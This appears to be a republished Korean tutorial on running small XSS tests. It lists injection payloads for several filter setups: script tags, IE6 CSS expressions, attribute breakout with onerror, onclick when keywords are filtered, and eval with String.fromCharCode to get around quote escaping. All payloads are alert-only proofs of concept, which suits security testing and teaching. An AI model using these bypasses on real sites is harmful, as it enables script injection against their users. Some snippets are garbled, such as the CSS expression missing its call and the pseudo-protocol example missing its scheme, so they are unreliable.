>  기사  >  운영 및 유지보수  >  xss의 소규모 테스트는 어떻게 수행됩니까?

xss의 소규모 테스트는 어떻게 수행됩니까?

WBOY
WBOY앞으로
2023-05-19 11:37:06991검색
  • 보안 제한 없음, 직접 사용

<script>alert(/xss/);</script>

  • 제한 사항: CSS만 사용할 수 있으며 html 태그는 허용되지 않습니다

Expression을 사용하여 XSS를 구성할 수 있다는 것을 알고 있지만 IE에서만 테스트할 수 있으므로 IE6에서 다음 테스트를 수행하세요.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
  • 제한사항: HTML은 이스케이프 처리되며 이미지 태그는 사용 가능.

테스트에 입력된 문자는 src 주소에 삽입되므로 의사 프로토콜을 사용하여 이를 우회할 수 있습니다.

직접 입력

alert( /xss/);

또는 이벤트를 사용하여 우회할 수도 있습니다. 다음과 같이 종료문에 주의하세요.

1" onerror=alert(/xss/); var a="1

  • 제한사항: 키워드 필터링이 사용됩니다.

테스트했는데 대부분 필터링되었으며 일부는 필터링되지 않았습니다. 테스트 후 스크립트/onerror는 필터링되었지만 onclick은 필터링되지 않았습니다. onclick 이벤트를 사용하여

<img src=# onclick=alert(/xss/);>
  • 제한 사항: 기능에 추가 래시를 사용하세요. 문자는 이스케이프 처리됩니다

. 이는 작은따옴표, 큰따옴표 및 기타 특성 문자가 XSS 문에 나타날 수 없음을 의미합니다.

<script>alert(/xss/);</script>

를 직접 사용하여

를 우회하거나 다음과 같이 String.fromCharCode 메서드를 사용하세요.

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

위 내용은 xss의 소규모 테스트는 어떻게 수행됩니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
이 기사는 yisu.com에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제